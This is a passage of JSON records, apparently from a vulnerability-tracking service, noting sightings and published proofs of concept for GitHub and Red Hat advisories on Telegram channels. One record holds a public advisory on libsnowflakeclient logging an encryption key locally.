"Telegram/2BMM755ne3lal0lwprVbbhsIWa6rcrWtzsF6kYgV_L6gHDk", "content": "", "creation_timestamp": "2026-04-06T15:20:35.000000Z"}, {"uuid": "48a2ce1e-047d-4a98-90c9-a27dbb14c6fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2865", "type": "seen", "source": "Telegram/2BMM755ne3lal0lwprVbbhsIWa6rcrWtzsF6kYgV_L6gHDk", "content": "", "creation_timestamp": "2026-04-06T15:20:35.000000Z"}, {"uuid": "a9627733-b311-4453-873a-961674cd4e5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-86JC-7R6Q-CR3F", "type": "seen", "source": "Telegram/c7uZKOPwVy2hcS0GAJgtvZD1v9y_KI-NyzhYNMP5jQugHxE", "content": "", "creation_timestamp": "2026-04-13T21:22:40.000000Z"}, {"uuid": "37a04cab-9722-44a0-949f-e4cb850e72b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-875V-7M49-8X88", "type": "seen", "source": "Telegram/1z3cy8_b4nyTXxlXgo7X-5B9mikKWob2N9UfH7kQzWNiwJw", "content": "", "creation_timestamp": "2026-04-13T23:20:55.000000Z"}, {"uuid": "2bcd0a6f-9132-4729-acfa-2d6e08c02576", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F984-PCP8-V2P7", "type": "seen", "source": "Telegram/1z3cy8_b4nyTXxlXgo7X-5B9mikKWob2N9UfH7kQzWNiwJw", "content": "", "creation_timestamp": "2026-04-13T23:20:55.000000Z"}, {"uuid": "c9f7e67a-b335-464d-9773-c5de62a93eba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3959-6V5Q-45Q2", "type": "seen", "source": "Telegram/EXit4BCARRaTXD4SBLqO-yd3UPN_B5jBijYowsPR2aTE5HY", "content": "", "creation_timestamp": "2026-04-14T05:17:42.000000Z"}, {"uuid": "fc3d62a6-f564-4708-bc2e-ffd9df9a1762", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VC46-VW85-3WVM", "type": "seen", "source": "Telegram/EXit4BCARRaTXD4SBLqO-yd3UPN_B5jBijYowsPR2aTE5HY", "content": "", "creation_timestamp": "2026-04-14T05:17:42.000000Z"}, {"uuid": "60a6cc50-16fc-44b6-b1f3-4b27775260d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G985-WJH9-QXXC", "type": "seen", "source": "Telegram/EXit4BCARRaTXD4SBLqO-yd3UPN_B5jBijYowsPR2aTE5HY", "content": "", "creation_timestamp": "2026-04-14T05:17:42.000000Z"}, {"uuid": "23263c7b-906a-4f8d-86f1-be62f66014e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8X8F-54WF-VV92", "type": "seen", "source": "Telegram/EXit4BCARRaTXD4SBLqO-yd3UPN_B5jBijYowsPR2aTE5HY", "content": "", "creation_timestamp": "2026-04-14T05:17:42.000000Z"}, {"uuid": "69c7553f-102c-4bb4-812e-0130a6ea09ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FVXX-GGMX-3CJG", "type": "seen", "source": "Telegram/1cCualj_PQDoYUsDnolnQpk7NGC4b1xwJPWps9hRWMxLLCE", "content": "", "creation_timestamp": "2026-04-09T23:30:43.000000Z"}, {"uuid": "6915d6f3-31dc-42d1-a040-023fecb137a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-49XC-52MP-CC9J", "type": "published-proof-of-concept", "source": "Telegram/nXzIQMx_PCOAGX3i8onWM2mwWKDsz1vr3NClJO_7twhRFOo", "content": "", "creation_timestamp": "2026-04-09T23:29:02.000000Z"}, {"uuid": "4fa8a0b1-7ef5-41cc-a1bb-e7b2ef1c7ce6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FQW4-MPH7-2VR8", "type": "published-proof-of-concept", "source": "Telegram/n2dd6XRjJv9G8jt1S2EaZawu98TdZ3-sGq35ZGwXZFcMAwI", "content": "", "creation_timestamp": "2026-04-09T23:30:23.000000Z"}, {"uuid": "bab09288-9c62-4450-98a6-5f1de9aa0739", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2VQ4-854F-5C72", "type": "published-proof-of-concept", "source": "Telegram/-hUuw8aTFVWSQYPf3qEKqcT3Zmmt4K4bisrN5sFAqL07rbc", "content": "", "creation_timestamp": "2026-04-10T19:30:36.000000Z"}, {"uuid": "92f32b9b-724c-45bf-a6f7-1b15b0e514b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WQ58-2PVG-5H4F", "type": "published-proof-of-concept", "source": "Telegram/322WwBU1dw1XQZkuhsa_ku_ExWgO3IPBT_TwKsYVMIxa3Dc", "content": "", "creation_timestamp": "2026-04-10T19:31:00.000000Z"}, {"uuid": "fcda9e2e-4568-4e40-95fd-5e71a6228a48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QM9X-V7CX-7RQ4", "type": "published-proof-of-concept", "source": "Telegram/322WwBU1dw1XQZkuhsa_ku_ExWgO3IPBT_TwKsYVMIxa3Dc", "content": "", "creation_timestamp": "2026-04-10T19:31:00.000000Z"}, {"uuid": "0c65275c-c6e0-477c-b9bb-5beebcab5c00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FVCV-3M26-PCQX", "type": "seen", "source": "Telegram/EoubZoYE34cwfOKYIK3rDqJUepVUHxboU2AFga2-YHkJtiw", "content": "", "creation_timestamp": "2026-04-10T21:24:33.000000Z"}, {"uuid": "8cdea8fd-c7f4-49eb-976a-33156a0743db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JX2W-VP7F-456Q", "type": "seen", "source": "Telegram/EoubZoYE34cwfOKYIK3rDqJUepVUHxboU2AFga2-YHkJtiw", "content": "", "creation_timestamp": "2026-04-10T21:24:33.000000Z"}, {"uuid": "f1e155f5-87cf-445a-acb9-f8f50d7679b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3MCX-6WXM-QR8V", "type": "seen", "source": "Telegram/EoubZoYE34cwfOKYIK3rDqJUepVUHxboU2AFga2-YHkJtiw", "content": "", "creation_timestamp": "2026-04-10T21:24:33.000000Z"}, {"uuid": "fa1bedfa-cc06-4225-98aa-8cf385437574", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2880", "type": "seen", "source": "Telegram/zfToAAWf8eWnJ7ba07A0EZZ_iZLhP55gYdeGjYzJA6KMcCw", "content": "", "creation_timestamp": "2026-04-06T15:19:47.000000Z"}, {"uuid": "104f479f-5922-4307-99ba-4465cab3fdc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2875", "type": "seen", "source": "Telegram/zfToAAWf8eWnJ7ba07A0EZZ_iZLhP55gYdeGjYzJA6KMcCw", "content": "", "creation_timestamp": "2026-04-06T15:19:47.000000Z"}, {"uuid": "4843aadb-ca24-4120-a346-f3a644460c01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2879", "type": "seen", "source": "Telegram/zfToAAWf8eWnJ7ba07A0EZZ_iZLhP55gYdeGjYzJA6KMcCw", "content": "", "creation_timestamp": "2026-04-06T15:19:47.000000Z"}, {"uuid": "e6169bcc-4456-4e30-b989-3e91f632672f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2875", "type": "seen", "source": "Telegram/YPTFZMnbtWpnAikWtS-r7Wh5pSyLx87YJDgdlbqcufwDCfc", "content": "", "creation_timestamp": "2026-04-06T15:21:07.000000Z"}, {"uuid": "cc73fd2d-f67e-4007-ae96-698234c347f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2866", "type": "seen", "source": "Telegram/XnXiOLLeSA7x6QvYztZ81GubEg3cvrCefUsx39ENip1AnlE", "content": "", "creation_timestamp": "2026-04-06T15:21:14.000000Z"}, {"uuid": "338dbc8f-9fb1-4bda-a55d-08d035c87bfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7163", "type": "seen", "source": "Telegram/XnXiOLLeSA7x6QvYztZ81GubEg3cvrCefUsx39ENip1AnlE", "content": "", "creation_timestamp": "2026-04-06T15:21:14.000000Z"}, {"uuid": "710d9888-572d-443d-b9d3-1fd6ab788e46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JX4F-645P-WJPX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13786", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46329\n\ud83d\udd25 CVSS Score: 3.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: libsnowflakeclient is the Snowflake Connector for C/C++. Versions starting from 0.5.0 to before 2.2.0, are vulnerable to local logging of sensitive information. When the logging level was set to DEBUG, the Connector would log locally the client-side encryption master key of the target stage during the execution of GET/PUT commands. This key by itself does not grant access to any sensitive data without additional access authorizations, and is not logged server-side by Snowflake. This issue has been patched in version 2.2.0.\n\ud83d\udccf Published: 2025-04-29T04:35:49.431Z\n\ud83d\udccf Modified: 2025-04-29T04:35:49.431Z\n\ud83d\udd17 References:\n1. https://github.com/snowflakedb/libsnowflakeclient/security/advisories/GHSA-jx4f-645p-wjpx\n2. https://github.com/snowflakedb/libsnowflakeclient/commit/3caa8a6a3ee95e0a66ead03b4bf6a2d1ca42ebfe", "creation_timestamp": "2025-04-29T05:11:27.000000Z"}, {"uuid": "e74ffa78-f94a-4ffc-b74a-9f7ba4986d12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-27X6-C5C7-GPF5", "type": "seen", "source": "Telegram/FB_FE1jRDxJPr8K8_KBUfFYtlwI9wezi1OF7LpQ32t_R7vo", "content": "", "creation_timestamp": "2026-04-10T21:24:11.000000Z"}, {"uuid": "54ee1f8b-6afa-4aec-813a-560c5f7d5fd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F27G-66GQ-G7V2", "type": "seen", "source": "Telegram/ZR_wkJT-g6xqpr38tjocBfuP9bsA0qHKZRvqY91xv80DRmI", "content": "", "creation_timestamp": "2026-04-10T21:24:20.000000Z"}, {"uuid": "cd53abc8-d293-4a98-93f3-f5a9965218a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GVRJ-CJCH-728P", "type": "published-proof-of-concept", "source": "Telegram/or2m_3WCYby8bXskMQzpfDu1qBTJahou7yZRDnRXRdJQw8o", "content": "", "creation_timestamp": "2026-04-01T11:16:06.000000Z"}, {"uuid": "39b4c75f-00b0-4cb4-bb6d-12aab6240b6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G9C2-GF25-3X67", "type": "seen", "source": "Telegram/lZIbbZM6hBayBvqPlVKcR-m9kDIyKTvG_CXDWINXAPChKhQ", "content": "", "creation_timestamp": "2026-04-01T23:26:58.000000Z"}, {"uuid": "9bab7e40-6151-4a02-ac71-29be7b5a8708", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7XXH-373W-35VG", "type": "seen", "source": "Telegram/bl6LC3S0UxxO5vDfC3lE4LaBC6O_bKrhuhRcx8XqwmK5Cxg", "content": "", "creation_timestamp": "2026-04-01T23:27:18.000000Z"}, {"uuid": "1cdc565e-029d-4ccf-8b7e-05e33d7ceaa1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MMXC-95CH-2J7C", "type": "seen", "source": "Telegram/bl6LC3S0UxxO5vDfC3lE4LaBC6O_bKrhuhRcx8XqwmK5Cxg", "content": "", "creation_timestamp": "2026-04-01T23:27:18.000000Z"}, {"uuid": "b0a91f8b-66d7-4535-adbb-0691d631c84d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GR22-4784-XVW3", "type": "seen", "source": "Telegram/2ZRPJX-1sLKzKjRuu5udQKo36EYUbcyEMGSCPR0-mfcyWco", "content": "", "creation_timestamp": "2026-04-02T15:21:32.000000Z"}, {"uuid": "d7160931-773a-49be-b958-50796f62c4fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RP9M-JCPW-HGGR", "type": "seen", "source": "Telegram/2ZRPJX-1sLKzKjRuu5udQKo36EYUbcyEMGSCPR0-mfcyWco", "content": "", "creation_timestamp": "2026-04-02T15:21:32.000000Z"}, {"uuid": "75781179-d31e-46b5-96e2-50e95bc514b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9WHH-MFFV-XVH6", "type": "published-proof-of-concept", "source": "Telegram/y_cWx5Vj-wYUL0P5R2C1zZYk0HaTfy6prCoTNEJeY1xTJx8", "content": "", "creation_timestamp": "2026-04-03T17:26:14.000000Z"}, {"uuid": "6cb52c2b-2f76-449c-b63a-3a30bc963799", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GJXX-92W9-8V8F", "type": "published-proof-of-concept", "source": "Telegram/y_cWx5Vj-wYUL0P5R2C1zZYk0HaTfy6prCoTNEJeY1xTJx8", "content": "", "creation_timestamp": "2026-04-03T17:26:14.000000Z"}, {"uuid": "51984a2f-76da-47b1-9a73-f2b19937ccc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-42X7-VVJ4-4CJ3", "type": "published-proof-of-concept", "source": "Telegram/y_cWx5Vj-wYUL0P5R2C1zZYk0HaTfy6prCoTNEJeY1xTJx8", "content": "", "creation_timestamp": "2026-04-03T17:26:14.000000Z"}, {"uuid": "2ccb81f7-2476-4e78-9a1c-587ffbcaa9bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3WC-44P4-M4J7", "type": "published-proof-of-concept", "source": "Telegram/y_cWx5Vj-wYUL0P5R2C1zZYk0HaTfy6prCoTNEJeY1xTJx8", "content": "", "creation_timestamp": "2026-04-03T17:26:14.000000Z"}, {"uuid": "f986610e-58e9-4215-881b-3035026dc3a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J8RJ-FMPV-WCXW", "type": "published-proof-of-concept", "source": "Telegram/y_cWx5Vj-wYUL0P5R2C1zZYk0HaTfy6prCoTNEJeY1xTJx8", "content": "", "creation_timestamp": "2026-04-03T17:26:14.000000Z"}, {"uuid": "958d80d0-9989-4857-8353-f4b4690516b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2874", "type": "seen", "source": "Telegram/zfToAAWf8eWnJ7ba07A0EZZ_iZLhP55gYdeGjYzJA6KMcCw", "content": "", "creation_timestamp": "2026-04-06T15:19:47.000000Z"}, {"uuid": "2058bdf1-ee21-4381-b907-7f3f73907017", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2502", "type": "seen", "source": "Telegram/zfToAAWf8eWnJ7ba07A0EZZ_iZLhP55gYdeGjYzJA6KMcCw", "content": "", "creation_timestamp": "2026-04-06T15:19:47.000000Z"}, {"uuid": "31e994ce-b4ff-44e8-bc77-8831bf19c346", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7458", "type": "seen", "source": "Telegram/0sUuWW8J84hCZb1n0MF5lAvDyk6dii4XfiqOlA0c3Bj-PlY", "content": "", "creation_timestamp": "2026-04-06T15:20:12.000000Z"}, {"uuid": "e4268a89-da80-4576-a027-585dec04a291", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2874", "type": "seen", "source": "Telegram/8HAXDkwfUuERvEZPrRm02gndBwAxNxuQaWo6blnqeOPCpO4", "content": "", "creation_timestamp": "2026-04-06T15:20:42.000000Z"}, {"uuid": "7de97d59-c88d-4667-a45b-0c0b9764abfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R57Q-R5V3-V5H8", "type": "seen", "source": "Telegram/_n5Nok_-XlRHEre5O89LvYLplT02rw8wZYprnGR4USXlLgM", "content": "", "creation_timestamp": "2026-04-06T17:32:38.000000Z"}, {"uuid": "25fdc3fc-70c4-4e49-a0ba-aac67974573c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W88V-VQHQ-5P24", "type": "seen", "source": "Telegram/_n5Nok_-XlRHEre5O89LvYLplT02rw8wZYprnGR4USXlLgM", "content": "", "creation_timestamp": "2026-04-06T17:32:38.000000Z"}, {"uuid": "872af3cb-09ef-4952-aaa2-94ec6655a4c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJHC-V7C2-5HH6", "type": "published-proof-of-concept", "source": "Telegram/ECjdy8s76GZ_Bal_wnIB79ij56tbajMepr_VumTyCn-zmzM", "content": "", "creation_timestamp": "2026-04-06T19:28:45.000000Z"}, {"uuid": "602edb62-76cd-45aa-97f8-faa00f90e21e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7429-HXCV-268M", "type": "seen", "source": "Telegram/A5UZ2oyBVNNJX5Wa4LER5v-0-0dFFVXEqLDkZYQ_ngP9k5Q", "content": "", "creation_timestamp": "2026-04-03T07:15:40.000000Z"}, {"uuid": "4ad15850-885d-418f-a74a-d3ea30f02a37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9M44-RR2W-PPP7", "type": "seen", "source": "Telegram/DMrtbPbyVuvJyzUNlrr2TA99ljgvsTw1ZTHgoXyjyFD12Ec", "content": "", "creation_timestamp": "2026-04-03T15:23:03.000000Z"}, {"uuid": "a2d9c439-0d7d-467c-b93a-638209147040", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FCM4-4PJ2-M5HF", "type": "published-proof-of-concept", "source": "Telegram/CfZ2Rt5oDMh5hfP6-7c66YyH_Az2lNtcnTrevEl4rY2ivCc", "content": "", "creation_timestamp": "2026-04-03T17:26:47.000000Z"}, {"uuid": "c5c19445-c93d-4666-a219-4d46a97ab804", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FC46-R95F-HQ7G", "type": "published-proof-of-concept", "source": "Telegram/faPFXRAaRfhi9SNZmtwnWuzO2c0g7l8werKC93MLkaum65E", "content": "", "creation_timestamp": "2026-04-13T19:18:48.000000Z"}, {"uuid": "5779f731-19ff-435c-9633-aed7bb2495a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WWJ8-GXM6-JC29", "type": "published-proof-of-concept", "source": "Telegram/j1YKUKFGBq5wmef4QEbA7k-TdRl9f0BaDNzVfGs6U0ZXPS4", "content": "", "creation_timestamp": "2026-04-14T01:15:38.000000Z"}, {"uuid": "28aa4dcc-d7d3-418d-bb21-6d0c96b54b00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JHXM-H53P-JM7W", "type": "seen", "source": "Telegram/6RgwCZFc4Ae1eVERGO141ZaFCzd_AoL4kSRzFJKo9cZLKyo", "content": "", "creation_timestamp": "2026-04-09T21:22:00.000000Z"}, {"uuid": "e5814ddb-f46c-4574-a1d4-4a98de9ccbb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6GM9-3G7M-3965", "type": "published-proof-of-concept", "source": "Telegram/3Mh7UNYEFXpMlnqwZliCqvVomRJKwd1lMrCq1dUb7HxJoTM", "content": "", "creation_timestamp": "2026-04-09T21:22:41.000000Z"}, {"uuid": "173e27b8-288f-432b-9e8e-652d4c9a2533", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2763-CJ5R-C79M", "type": "published-proof-of-concept", "source": "Telegram/3Mh7UNYEFXpMlnqwZliCqvVomRJKwd1lMrCq1dUb7HxJoTM", "content": "", "creation_timestamp": "2026-04-09T21:22:41.000000Z"}, {"uuid": "c8178ec8-1218-43f3-bfd1-94fd0bc8a5e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8VVJ-7F7R-7V48", "type": "published-proof-of-concept", "source": "Telegram/3Mh7UNYEFXpMlnqwZliCqvVomRJKwd1lMrCq1dUb7HxJoTM", "content": "", "creation_timestamp": "2026-04-09T21:22:41.000000Z"}, {"uuid": "1aa30a24-9546-459b-aa65-8fbd540dfdb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RHFG-J8JQ-7V2H", "type": "published-proof-of-concept", "source": "Telegram/n2dd6XRjJv9G8jt1S2EaZawu98TdZ3-sGq35ZGwXZFcMAwI", "content": "", "creation_timestamp": "2026-04-09T23:30:23.000000Z"}, {"uuid": "a93443b5-57f0-4b7a-a69c-3b2bf4783fe3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q5R4-47M9-5MC7", "type": "seen", "source": "Telegram/1cCualj_PQDoYUsDnolnQpk7NGC4b1xwJPWps9hRWMxLLCE", "content": "", "creation_timestamp": "2026-04-09T23:30:43.000000Z"}, {"uuid": "30c256a9-605f-4b7f-87fd-a2a61bb8551a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4WR3-F4P3-5WJH", "type": "seen", "source": "Telegram/1cCualj_PQDoYUsDnolnQpk7NGC4b1xwJPWps9hRWMxLLCE", "content": "", "creation_timestamp": "2026-04-09T23:30:43.000000Z"}, {"uuid": "5770aee6-82c5-4836-88dc-93d13fa94541", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G99C-H7J7-RFHV", "type": "published-proof-of-concept", "source": "Telegram/E9uORDS5VkHsQsN2ALVesQEvtj4s64kK7xuccSs6pLn_-94", "content": "", "creation_timestamp": "2026-04-13T21:22:51.000000Z"}, {"uuid": "65f51e8b-8a7f-4297-bf32-56a66355c62f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X783-XP3G-MQHP", "type": "published-proof-of-concept", "source": "Telegram/pSCC_NMgE3Fpe3zcCZgeqk6LWYSbZiR1jqFncMFnyrTX8KY", "content": "", "creation_timestamp": "2026-04-14T05:18:05.000000Z"}, {"uuid": "80433138-b610-43d1-911f-dfbbf56f5715", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HC36-C89J-5F4J", "type": "seen", "source": "Telegram/Y2UpQC9zCL6PqNfAxsSoQJ7YUumR5oW0JI3RILB7SgtOVH4", "content": "", "creation_timestamp": "2026-04-09T19:23:14.000000Z"}, {"uuid": "e566e242-7b2c-4bde-9654-260da1abc3d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CHQC-8P9Q-PQ6Q", "type": "seen", "source": "Telegram/Y2UpQC9zCL6PqNfAxsSoQJ7YUumR5oW0JI3RILB7SgtOVH4", "content": "", "creation_timestamp": "2026-04-09T19:23:14.000000Z"}, {"uuid": "eeaff9bc-c26d-4ff5-af64-f17893bd8989", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2679-6MX9-H9XC", "type": "seen", "source": "Telegram/Y2UpQC9zCL6PqNfAxsSoQJ7YUumR5oW0JI3RILB7SgtOVH4", "content": "", "creation_timestamp": "2026-04-09T19:23:14.000000Z"}, {"uuid": "d189d401-fd91-495f-86ef-00d2a33dc50e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9HFR-GW99-8RHX", "type": "seen", "source": "Telegram/Y2UpQC9zCL6PqNfAxsSoQJ7YUumR5oW0JI3RILB7SgtOVH4", "content": "", "creation_timestamp": "2026-04-09T19:23:14.000000Z"}, {"uuid": "1877138d-6848-4d77-8d20-01ddd6525862", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GXR3-FWC7-Q99H", "type": "published-proof-of-concept", "source": "Telegram/xKxKUYX0BRejEqYlrURXsjCQY9BctYcoeewN_mSMWqY7riM", "content": "", "creation_timestamp": 